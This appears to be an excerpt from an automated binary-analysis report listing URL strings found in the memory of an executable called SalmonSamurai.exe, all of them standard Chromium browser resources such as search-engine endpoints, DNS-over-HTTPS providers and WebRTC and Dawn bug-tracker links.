Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions-01
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.neti.ee/api/suggestOS?suggestQuery=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.neti.ee/cgi-bin/otsing?query=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.neti.ee/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.neti.ee/favicon.icohttp://www.neti.ee/cgi-bin/otsing?query=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.searchnu.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.searchnu.com/favicon.icohttp://www.searchnu.com/web?hl=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.searchnu.com/web?hl=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.walla.co.il/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.walla.co.il/favicon.icohttp://search.walla.co.il/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.webrtc.org/experiments/rtp-hdrext/abs-capture-time
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.webrtc.org/experiments/rtp-hdrext/abs-send-time
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.webrtc.org/experiments/rtp-hdrext/generic-frame-descriptor-00
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.webrtc.org/experiments/rtp-hdrext/transport-wide-cc-02
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ac.search.naver.com/nx/ac?of=os&ie=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://alekberg.net/privacy
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://alekberg.net/privacyalekberg.net
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://aomediacodec.github.io/av1-rtp-spec/#dependency-descriptor-rtp-header-extension
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://api.oceanhero.today/suggestions?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://api.qwant.com/api/suggest/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ar.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ar.search.yahoo.com/favicon.icohttps://ar.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ar.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ar.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://at.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://at.search.yahoo.com/favicon.icohttps://at.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://at.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://at.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://au.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://au.search.yahoo.com/favicon.icohttps://au.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://au.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://au.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://br.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://br.search.yahoo.com/favicon.icohttps://br.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://br.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://br.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=1178
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=1178depth32float-stencil8Support
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=1197
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=1197shader-f16Supports
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=1510
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=1510rg11b10ufloat-renderableAllows
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=1518
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=1518bgra8unorm-storageAllows
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=1591
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=1591dawn-internal-usagesAdd
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=42
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=42texture-compression-etc2Support
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=434
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=434timestamp-querySupport
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=551
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=551dawn-nativeWebGPU
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=690
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=690chromium-experimental-dp4aSupport
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=955
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/dawn/issues/detail?id=955texture-compression-astcSupport
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/tint/issues/detail?id=1497
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://bugs.chromium.org/p/tint/issues/detail?id=1497indirect-first-instanceSupport
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ca.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ca.search.yahoo.com/favicon.icohttps://ca.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ca.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ca.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ch.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://chrome-devtools-frontend.appspot.com/
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://chrome-devtools-frontend.appspot.com/%s%s/%s/NetworkResourceLoaderstreamWriteInspectableWebC
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-queryone.one.one.one1dot1dot1dot1.cloudflare-dns.com1.1.1.11.0
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://chromium.dns.nextdns.io
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://cl.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://cl.search.yahoo.com/favicon.icohttps://cl.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://cl.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://cl.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://cleanbrowsing.org/privacy
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://cleanbrowsing.org/privacyCleanBrowsing
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://co.search.yahoo.com/favicon.ico
